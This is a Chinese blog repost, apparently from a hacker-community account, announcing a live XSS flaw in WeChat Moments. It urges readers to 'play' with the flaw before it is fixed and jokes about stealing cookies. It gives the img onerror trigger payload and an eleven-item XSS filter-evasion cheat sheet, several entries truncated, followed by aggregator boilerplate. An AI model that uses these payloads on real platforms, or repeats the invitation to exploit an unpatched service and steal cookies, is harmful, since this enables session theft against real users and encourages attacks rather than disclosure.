刷爆了,微信朋友圈Xss,快玩吧,很快会修复

Posted 黑白之道

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了刷爆了,微信朋友圈Xss,快玩吧,很快会修复相关的知识,希望对你有一定的参考价值。

哈哈。看下图!



搜索一下,打开就会弹窗了,是时候要盗cookies了,嘿嘿,邪恶的笑!


刷爆了,微信朋友圈Xss,快玩吧,很快会修复


分享格式!像这样的,

< img src=1 onerror=confirm("距离关机还5s");prompt("呵呵!");>

刷爆了,微信朋友圈Xss,快玩吧,很快会修复


具体操作过程,

获取祥细步骤!



附,Img xss 姿势

(1)普通的XSS javascript注入

<SCRIPT SRC=></SCRIPT>

(2)IMG标签XSS使用JavaScript命令

<SCRIPT SRC=></SCRIPT>

(3)IMG标签无分号无引号

<IMG SRC=javascript:alert(‘XSS’)>

(4)IMG标签大小写不敏感

<IMG SRC=JaVaScRiPt:alert(‘XSS’)>

(5)html编码(必须有分号)

<IMG SRC=javascript:alert(“XSS”)>

(6)修正缺陷IMG标签

<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”> 
(7)formCharCode标签(计算器) 
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))> 
(8)UTF-8的Unicode编码(计算器) 
<IMG SRC=jav..省略..S')> 
(9)7位的UTF-8的Unicode编码是没有分号的(计算器) 
<IMG SRC=jav..省略..S')> 
(10)十六进制编码也是没有分号(计算器) 
<IMG SRC=java..省略..XSS')> 
(11)嵌入式标签,将Javascript分开 
<IMG SRC=”javascript:alert(‘XSS’);”> 


亲喜欢吗?记得点赞 | 留言 | 分享


----------------------------------

要闻,干货,原创,专业
关注“黑白之道”微信:i77169 
华夏黑客同盟我们坚持,自由,免费,共享!



以上是关于刷爆了,微信朋友圈Xss,快玩吧,很快会修复的主要内容,如果未能解决你的问题,请参考以下文章

这款IDEA插件刷爆了朋友圈,网友:这用起来有点酸爽~

这款IDEA插件刷爆了朋友圈,网友:这用起来有点酸爽~

陈可辛用iphoneX拍了条新年广告!一发布就刷爆了朋友圈!

超值爆赞丨Java 程序员推荐的学习教程,刷爆了朋友圈...

算不算类似微信小程序

图片在固定的宽高中不变形展示(访微信朋友圈图片展示)